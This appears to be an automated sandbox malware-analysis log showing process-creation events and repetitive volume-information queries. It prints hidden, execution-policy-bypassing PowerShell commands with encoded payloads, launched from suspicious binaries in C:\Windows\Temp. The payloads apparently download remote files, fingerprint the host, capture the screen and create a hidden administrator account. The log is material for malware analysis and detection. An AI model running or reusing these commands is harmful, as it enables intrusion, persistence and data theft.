jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakag	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
